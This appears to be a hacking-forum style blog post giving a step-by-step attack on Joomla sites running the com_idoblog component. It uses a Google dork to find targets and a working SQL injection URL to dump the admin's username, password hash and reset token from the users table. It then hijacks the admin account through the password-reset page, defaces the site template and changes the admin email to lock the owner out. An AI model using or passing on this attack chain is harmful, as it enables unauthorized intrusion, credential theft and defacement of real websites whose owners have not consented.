Tools
required:
SQL-i Knowledge
reiluke SQLiHelper 2.7
Joomla! Query Knowledge
SQL-i Knowledge
reiluke SQLiHelper 2.7
Joomla! Query Knowledge
Finding
Exploit And Target
Those two
steps could go in different order, depend what you find first target or
exploit…
Google dork:
inurl:”option=com_idoblog”
Comes up
with results for about 140,000 pages
At
inj3ct0r.com search for: com_idoblog
Give us back
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==
Joomla
Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,
11,12,13,14,15,16+from+jos_users–
Exploit can
be separated in two parts:
Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part
opening blog Admin page and if Admin page don’t exist, exploit won’t worked
(not completely confirmed)
Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1
5,16+from+jos_users–
This part
looking for username and password from jos_users table
Testing
Vulnerability
Disable
images for faster page loading:
[Firefox]
Tools
>> Options >> Content (tab menu) >> and unclick ‘Load images
automatically’
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load
normally…
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content
blog Profile Admin
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
Site is
vulnerable
Inject
Target
Open reiluke
SQLiHelper 2.7
In Target
copy
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on
Inject
Follow
standard steps until you find Column Name, as a result we have
Notice that
exploit from inj3ct0r wouldn’t work here because it looking for jos_users table
and as you can see
our target
use jos153_users table for storing data
Let Dump
username, email, password from Column Name jos153_users. Click on Dump Now
username:
admin
email:
info@site.com
password:
169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI
Joomla!
1.5.x uses md5 to hash the passwords. When the passwords are created, they are
hashed with a
32 character
salt that is appended to the end of the password string. The password is stored
as
{TOTAL
HASH}:{ORIGINAL SALT}. So to hack that password take time and time…
The easiest
way to hack is to reset Admin password!
Admin
Password Reset
Go to:
Code:
http://www.site.com/index.php?option=com_user&view=reset
This is
standard Joomla! query for password reset request
Forgot your
Password? page will load.
In E-mail
Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find
right admin email, Confirm your account. page will load, asking for Token:
Finding
Token
To find
token go back to reiluke SQLiHelper 2.7 and dump username and activation from
Column Name jos153_users
username:
admin
activation:
5482dd177624761a290224270fa55f1d
5482dd177624761a290224270fa55f1d
is 32 char verification token, enter it and pres Submit.
If you done
everything ok, Rest your Password page will load. Enter your new password…
After that
go to:
Code:
http://www.site.com/administrator/
Standard
Joomla portal content management system
Enter
username admin and your password, click on Login
Go to
Extensions >> Template Manager >> Default Template Name >>
Edit HTML
In Template
HTML Editor insert your defaced code, click Apply, Save and you are done!!!
To make
admin life more miserable, click on admin in main Joomla window and in User
Details page change admin E-mail
Credit:
MindFreak [HckGuide]
0 komentar:
Posting Komentar